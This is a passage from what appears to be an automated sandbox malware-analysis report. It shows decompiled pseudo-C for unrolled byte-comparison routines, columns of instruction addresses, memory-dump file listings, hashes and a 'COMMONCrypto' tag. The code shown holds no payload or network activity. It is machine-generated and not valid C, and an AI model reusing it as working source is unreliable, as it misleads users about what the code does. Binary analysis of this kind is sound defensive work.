											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}






























                                                                                                                                                      0x1000bc57
                                                                                                                                                      0x1000bc57
                                                                                                                                                      0x1000bc5d
                                                                                                                                                      0x1000bcdc
                                                                                                                                                      0x1000bcde
                                                                                                                                                      0x1000bce0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bce6
                                                                                                                                                      0x1000bcec
                                                                                                                                                      0x1000bd6b
                                                                                                                                                      0x1000bd6d
                                                                                                                                                      0x1000bd6f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bd75
                                                                                                                                                      0x1000bd7b
                                                                                                                                                      0x1000bdfa
                                                                                                                                                      0x1000bdfc
                                                                                                                                                      0x1000bdfe
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000be04
                                                                                                                                                      0x1000be0a
                                                                                                                                                      0x1000be89
                                                                                                                                                      0x1000be8b
                                                                                                                                                      0x1000be8d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000be93
                                                                                                                                                      0x1000be99
                                                                                                                                                      0x1000bf18
                                                                                                                                                      0x1000bf1a
                                                                                                                                                      0x1000bf1c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bf28
                                                                                                                                                      0x1000bfa8
                                                                                                                                                      0x1000bfaa
                                                                                                                                                      0x1000bfac
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bfb2
                                                                                                                                                      0x1000bfb8
                                                                                                                                                      0x1000c037
                                                                                                                                                      0x1000c039
                                                                                                                                                      0x1000c03b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c049
                                                                                                                                                      0x1000c04b
                                                                                                                                                      0x1000c05c
                                                                                                                                                      0x1000c05c
                                                                                                                                                      0x1000bc51
                                                                                                                                                      0x1000c9ad
                                                                                                                                                      0x1000c9ad
                                                                                                                                                      0x1000bfc1
                                                                                                                                                      0x1000bfc3
                                                                                                                                                      0x1000bfda
                                                                                                                                                      0x1000bfe2
                                                                                                                                                      0x1000bfe4
                                                                                                                                                      0x1000bffb
                                                                                                                                                      0x1000c003
                                                                                                                                                      0x1000c005
                                                                                                                                                      0x1000c01c
                                                                                                                                                      0x1000c024
                                                                                                                                                      0x1000c026
                                                                                                                                                      0x1000c033
                                                                                                                                                      0x1000c033
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c026
                                                                                                                                                      0x1000c012
                                                                                                                                                      0x1000c016
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c016
                                                                                                                                                      0x1000bff1
                                                                                                                                                      0x1000bff5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bff5
                                                                                                                                                      0x1000bfd0
                                                                                                                                                      0x1000bfd4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bfd4
                                                                                                                                                      0x1000bf32
                                                                                                                                                      0x1000bf34
                                                                                                                                                      0x1000bf4b
                                                                                                                                                      0x1000bf53
                                                                                                                                                      0x1000bf55
                                                                                                                                                      0x1000bf6c
                                                                                                                                                      0x1000bf74
                                                                                                                                                      0x1000bf76
                                                                                                                                                      0x1000bf8d
                                                                                                                                                      0x1000bf95
                                                                                                                                                      0x1000bf97
                                                                                                                                                      0x1000bfa4
                                                                                                                                                      0x1000bfa4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bf97
                                                                                                                                                      0x1000bf83
                                                                                                                                                      0x1000bf87
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bf87
                                                                                                                                                      0x1000bf62
                                                                                                                                                      0x1000bf66
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bf66
                                                                                                                                                      0x1000bf41
                                                                                                                                                      0x1000bf45
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bf45
                                                                                                                                                      0x1000bea2
                                                                                                                                                      0x1000bea4
                                                                                                                                                      0x1000bebb
                                                                                                                                                      0x1000bec3
                                                                                                                                                      0x1000bec5
                                                                                                                                                      0x1000bedc
                                                                                                                                                      0x1000bee4
                                                                                                                                                      0x1000bee6
                                                                                                                                                      0x1000befd
                                                                                                                                                      0x1000bf05
                                                                                                                                                      0x1000bf07
                                                                                                                                                      0x1000bf14
                                                                                                                                                      0x1000bf14
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bf07
                                                                                                                                                      0x1000bef3
                                                                                                                                                      0x1000bef7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bef7
                                                                                                                                                      0x1000bed2
                                                                                                                                                      0x1000bed6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bed6
                                                                                                                                                      0x1000beb1
                                                                                                                                                      0x1000beb5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000beb5
                                                                                                                                                      0x1000be13
                                                                                                                                                      0x1000be15
                                                                                                                                                      0x1000be2c
                                                                                                                                                      0x1000be34
                                                                                                                                                      0x1000be36
                                                                                                                                                      0x1000be4d
                                                                                                                                                      0x1000be55
                                                                                                                                                      0x1000be57
                                                                                                                                                      0x1000be6e
                                                                                                                                                      0x1000be76
                                                                                                                                                      0x1000be78
                                                                                                                                                      0x1000be85
                                                                                                                                                      0x1000be85
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000be78
                                                                                                                                                      0x1000be64
                                                                                                                                                      0x1000be68
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000be68
                                                                                                                                                      0x1000be43
                                                                                                                                                      0x1000be47
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000be47
                                                                                                                                                      0x1000be22
                                                                                                                                                      0x1000be26
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000be26
                                                                                                                                                      0x1000bd84
                                                                                                                                                      0x1000bd86
                                                                                                                                                      0x1000bd9d
                                                                                                                                                      0x1000bda5
                                                                                                                                                      0x1000bda7
                                                                                                                                                      0x1000bdbe
                                                                                                                                                      0x1000bdc6
                                                                                                                                                      0x1000bdc8
                                                                                                                                                      0x1000bddf
                                                                                                                                                      0x1000bde7
                                                                                                                                                      0x1000bde9
                                                                                                                                                      0x1000bdf6
                                                                                                                                                      0x1000bdf6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bde9
                                                                                                                                                      0x1000bdd5
                                                                                                                                                      0x1000bdd9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bdd9
                                                                                                                                                      0x1000bdb4
                                                                                                                                                      0x1000bdb8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bdb8
                                                                                                                                                      0x1000bd93
                                                                                                                                                      0x1000bd97
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bd97
                                                                                                                                                      0x1000bcf5
                                                                                                                                                      0x1000bcf7
                                                                                                                                                      0x1000bd0e
                                                                                                                                                      0x1000bd16
                                                                                                                                                      0x1000bd18
                                                                                                                                                      0x1000bd2f
                                                                                                                                                      0x1000bd37
                                                                                                                                                      0x1000bd39
                                                                                                                                                      0x1000bd50
                                                                                                                                                      0x1000bd58
                                                                                                                                                      0x1000bd5a
                                                                                                                                                      0x1000bd67
                                                                                                                                                      0x1000bd67
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bd5a
                                                                                                                                                      0x1000bd46
                                                                                                                                                      0x1000bd4a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bd4a
                                                                                                                                                      0x1000bd25
                                                                                                                                                      0x1000bd29
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bd29
                                                                                                                                                      0x1000bd04
                                                                                                                                                      0x1000bd08
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bc5f
                                                                                                                                                      0x1000bc5f
                                                                                                                                                      0x1000bc62
                                                                                                                                                      0x1000bc66
                                                                                                                                                      0x1000bc68
                                                                                                                                                      0x1000bc7f
                                                                                                                                                      0x1000bc7f
                                                                                                                                                      0x1000bc83
                                                                                                                                                      0x1000bc87
                                                                                                                                                      0x1000bc89
                                                                                                                                                      0x1000bca0
                                                                                                                                                      0x1000bca0
                                                                                                                                                      0x1000bca4
                                                                                                                                                      0x1000bca8
                                                                                                                                                      0x1000bcaa
                                                                                                                                                      0x1000bcc1
                                                                                                                                                      0x1000bcc1
                                                                                                                                                      0x1000bcc5
                                                                                                                                                      0x1000bcc9
                                                                                                                                                      0x1000bccb
                                                                                                                                                      0x1000bcd1
                                                                                                                                                      0x1000bcd4
                                                                                                                                                      0x1000bcd8
                                                                                                                                                      0x1000bcd8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bccb
                                                                                                                                                      0x1000bcb0
                                                                                                                                                      0x1000bcb3
                                                                                                                                                      0x1000bcb7
                                                                                                                                                      0x1000bcbb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bcbb
                                                                                                                                                      0x1000bc8f
                                                                                                                                                      0x1000bc92
                                                                                                                                                      0x1000bc96
                                                                                                                                                      0x1000bc9a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bc9a
                                                                                                                                                      0x1000bc6e
                                                                                                                                                      0x1000bc71
                                                                                                                                                      0x1000bc75
                                                                                                                                                      0x1000bc79
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bc79
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                      • Instruction ID: 0ccd22ddf1786b0bbd96d4c0f79b37cb1226c86665694e5d33448657031624c6
                                                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                      • Instruction Fuzzy Hash: A9C16F73C0EDF34A9375C92D446862AEAA2DFC16D432BC7E1CCD43F29D99269D049AD0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000B883, Relevance: .4, Instructions: 351COMMONCrypto
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000B883(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}































                                                                                                                                                      0x1000b883
                                                                                                                                                      0x1000b883
                                                                                                                                                      0x1000b889
                                                                                                                                                      0x1000b8fc
                                                                                                                                                      0x1000b8fe
                                                                                                                                                      0x1000b900
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000b906
                                                                                                                                                      0x1000b90c
